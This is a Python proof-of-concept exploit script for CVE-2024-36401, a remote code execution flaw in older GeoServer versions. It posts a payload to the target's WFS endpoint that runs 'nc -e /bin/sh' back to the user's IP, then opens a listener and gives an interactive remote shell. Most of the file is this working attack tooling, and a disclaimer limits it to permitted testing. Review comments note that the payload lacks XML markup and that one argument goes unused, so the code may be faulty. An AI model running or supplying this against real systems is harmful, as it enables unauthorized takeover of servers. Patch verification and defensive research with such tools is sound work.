#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
Author: x.com/MohamedNab1l
GitHub: https://github.com/bigb0x/CVE-2024-36401

About:
    POC for CVE-2024-36401: RCE for GeoServer versions prior to 2.25.1,
    2.24.3 and 2.23.5. This POC is based on the security advisory by phith0n:
    https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401

Note:
    This POC will attempt to establish a reverse shell from the vulnerable
    targets. It is aimed to work against Linux targets. You will need a
    machine with a published and accessible IP in order to run this POC.
    This technique assumes that nc is available at the remote target.

Usage:
    python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type

Please feel free to contact me if you have any comments or suggestions.

Version: 1.0.3

References:
    https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401

Disclaimer:
    I like to create my own tools for fun, work and educational purposes
    only. I do not support or encourage hacking or unauthorized access to
    any system or network. Please use my tools responsibly and only on
    systems where you have clear permission to test.
"""

import argparse
import os
import re
import select
import socket
import sys
import threading
import time
from urllib.parse import urlparse

import requests
from urllib3.exceptions import InsecureRequestWarning

# Requests below are sent with verify=False; silence the resulting warning.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# ANSI color codes
light_gray_color = '\033[37;1m'
dimmed_gray_color = '\033[90m'
honey_yellow_color = '\033[38;5;214m'
dim_yellow_color = "\033[33;1m"
cyan_color = '\033[96m'
green_color = '\033[92m'
red_color = '\033[31m'
reset_color = '\033[0m'

LOG_DIR = "logs"
THE_VERSION = "1.0.3"


def banner() -> None:
    """Print the colored start-up banner."""
    # NOTE(review): the spacing inside the three art rows was lost when the
    # file was collapsed; it is reconstructed here so the rows line up.
    print(f'''{honey_yellow_color}
┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓┏┓┏┓┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┣┓┃┃┃┫┃
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗┛┗╋┗┛┻
-> {light_gray_color}POC for CVE-2024-36401. Will try to obtain a shell on linux targets.{reset_color}
{honey_yellow_color}-> {light_gray_color}By: x.com/mohamednab1l
{honey_yellow_color}-> {honey_yellow_color}Use this wisely.{reset_color}
''')


def print_message(level: str, message: str) -> None:
    """Print *message* prefixed with a UTC timestamp and a colored level tag.

    Recognised levels are ``'info'``, ``'warning'`` and ``'error'``; any
    other level prints nothing.
    """
    current_time = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
    if level == 'info':
        print(f"{current_time} {green_color}[INFO]{reset_color} {message}")
    elif level == 'warning':
        print(f"{current_time} {honey_yellow_color}[VLUN] {message} {reset_color}")
    elif level == 'error':
        print(f"{current_time} {red_color}[ERROR]{message}{reset_color} ")


def create_log_dir() -> None:
    """Create ``LOG_DIR`` if it does not exist and report when it was created."""
    if not os.path.exists(LOG_DIR):
        os.makedirs(LOG_DIR)
        print_message('info', f"Log directory created: {LOG_DIR}")


def clean_host(url: str) -> str:
    """Return the host part of *url* without a leading ``www.`` or trailing ``/``.

    Falls back to the parsed path when the URL has no scheme (``urlparse``
    then leaves ``netloc`` empty).
    """
    parsed_url = urlparse(url)
    host = parsed_url.netloc or parsed_url.path
    host = re.sub(r'^www\.', '', host)
    host = re.sub(r'/$', '', host)
    return host


def send_poc_request(url, host, ip, port, type):
    """POST the request body to ``{url}/geoserver/wfs`` and report the status.

    Args:
        url: Base URL of the target, e.g. ``https://target:8080``.
        host: Value sent in the ``Host`` header.
        ip: Address interpolated into the request body.
        port: Port interpolated into the request body.
        type: Accepted for CLI compatibility; not referenced by the request
            body as it appears in this file.

    Exits the process (``SystemExit``) when the response status is 401, 403
    or 404. Request errors are reported and swallowed.
    """
    full_url = f"{url}/geoserver/wfs"
    headers = {
        "Host": host,
        "Accept-Encoding": "gzip, deflate, br",
        "Accept": "*/*",
        "Accept-Language": "en-US;q=0.9,en;q=0.8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36",
        "Connection": "close",
        "Cache-Control": "max-age=0",
        "Content-Type": "application/xml",
    }

    # NOTE(review): body reproduced verbatim from the file as received; it is
    # declared as application/xml but contains no markup here — left untouched.
    custom_payload = f""" exec(java.lang.Runtime.getRuntime(),'nc -e /bin/sh {ip} {port}') """

    try:
        response = requests.post(full_url, headers=headers, data=custom_payload, timeout=30, verify=False)
        print_message('info', f"Response status code: {dim_yellow_color}{response.status_code}{reset_color}")
        if response.status_code in [401, 404, 403]:
            print_message('info', "Target is not vulnerable.")
            sys.exit()
        else:
            print_message('info', "Request sent. Checking for incoming connections.")
    except requests.exceptions.RequestException as e:
        print_message('error', f"An error occurred: {e}")
        print_message('error', "Failed to send request!")


def receive_output(client_socket, timeout=5):
    """Read whatever the peer sends until it goes quiet, and return it as text.

    Reading stops when no data has arrived for *timeout* seconds after the
    last chunk, when nothing at all has arrived for ``2 * timeout`` seconds,
    when the peer closes the connection, or on a socket error.

    Args:
        client_socket: Connected socket; it is switched to non-blocking mode.
        timeout: Idle time in seconds (see above).

    Returns:
        The received bytes decoded as UTF-8 (undecodable bytes dropped),
        stripped of surrounding whitespace.
    """
    chunks = []
    client_socket.setblocking(False)
    last_activity = time.time()

    while True:
        # Idle budget: `timeout` once something arrived, twice that before.
        idle_limit = timeout if chunks else timeout * 2
        remaining = idle_limit - (time.time() - last_activity)
        if remaining <= 0:
            break

        # Sleep in select() instead of spinning on a non-blocking recv().
        try:
            readable, _, _ = select.select([client_socket], [], [], remaining)
        except (OSError, ValueError):
            break  # socket closed or otherwise unusable
        if not readable:
            continue  # deadline is re-evaluated at the top of the loop

        try:
            data = client_socket.recv(8192)
        except (BlockingIOError, InterruptedError):
            continue
        except OSError:
            break
        if not data:
            break  # peer closed the connection; nothing more will arrive

        chunks.append(data)
        last_activity = time.time()

    # Decode once so a multi-byte character split across chunks survives.
    return b''.join(chunks).decode('utf-8', errors='ignore').strip()


def interactive_shell(client_socket):
    """Relay lines typed on stdin to *client_socket* and print the replies.

    Sends ``id`` first and prints its output, then loops until the user types
    ``exit`` or an error occurs. The socket is always closed on the way out.
    On a normal end of session this raises ``SystemExit``, which terminates
    the calling thread.
    """
    print_message('warning', "Nice!, we got a remote shell! :)")
    try:
        client_socket.send(b"id\n")
        time.sleep(1)
        output = receive_output(client_socket)
        if output:
            print_message('warning', "Checking the output of 'id' command:")
            print(f"{output}")
        else:
            print("No output received from 'id' command.")

        print_message('warning', "Shell established!.")
        print_message('warning', "Type commands and press enter to send, or type 'exit' to end the session.")

        while True:
            try:
                command = input(f"{honey_yellow_color}shell> {reset_color}")
                if command.lower() == 'exit':
                    break
                client_socket.send(command.encode() + b'\n')
                time.sleep(1)
                output = receive_output(client_socket)
                if output:
                    print(output)
                else:
                    print_message('warning', "No output received.")
            except Exception as e:
                print_message('error', f"Error in shell: {e}")
                break
    finally:
        client_socket.close()
        print_message('info', "Shell connection closed.")
    sys.exit()


def listen(ip, port, stop_event):
    """Accept one TCP connection on ``ip:port`` and hand it to the shell loop.

    Polls ``accept()`` with a one-second timeout so that *stop_event* is
    checked regularly. A bind failure is reported and the function returns.

    Args:
        ip: Local address to bind.
        port: Local port to bind.
        stop_event: ``threading.Event``; listening stops once it is set.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            server.bind((ip, port))
        except OSError as e:
            print_message('error', f"An error occurred: {e}")
            return
        server.settimeout(1)
        server.listen(1)
        print_message('info', f"Listening on {ip}:{port}...")

        try:
            while not stop_event.is_set():
                try:
                    client, (client_ip, client_port) = server.accept()
                except socket.timeout:
                    continue
                print_message('info', f"Received connection from: {client_ip}:{client_port}")
                print_message('warning', "POC was successful!")
                interactive_shell(client)
        except Exception as e:
            print_message('error', f"An error occurred: {e}")


def main() -> None:
    """Parse the command line, start the listener thread and send the request."""
    banner()
    parser = argparse.ArgumentParser(description='POC for CVE-2024-36401')
    parser.add_argument('-u', required=True, help='Target, example https://target:8080')
    parser.add_argument('-ip', required=True, help='Your IP, example 192.168.1.1')
    # type=int lets argparse reject a non-numeric port with a usage error.
    parser.add_argument('-port', required=True, type=int, help='Port, example 1337')
    parser.add_argument('-type', required=True, help='Type, example sf:archsites')
    args = parser.parse_args()

    url = args.u
    ip = args.ip
    port = args.port
    object_type = args.type
    host = clean_host(url)

    stop_event = threading.Event()

    def listen_wrapper():
        listen(ip, port, stop_event)

    listen_thread = threading.Thread(target=listen_wrapper)
    listen_thread.daemon = True
    listen_thread.start()

    # Give the listener a moment to bind before the request goes out.
    time.sleep(1)

    try:
        # Send the POST request
        send_poc_request(url, host, ip, port, object_type)
        # Join in short slices so Ctrl-C is handled promptly.
        while listen_thread.is_alive():
            listen_thread.join(1)
    except KeyboardInterrupt:
        print_message('info', "Keyboard interrupt received. Cleaning up...")
    finally:
        stop_event.set()
        # (should be quick now)
        listen_thread.join(timeout=5)
        if listen_thread.is_alive():
            print_message('warning', "Listen thread did not stop in time. It will be terminated.")
        print_message('info', "Script execution completed. Exiting...")


if __name__ == "__main__":
    create_log_dir()
    main()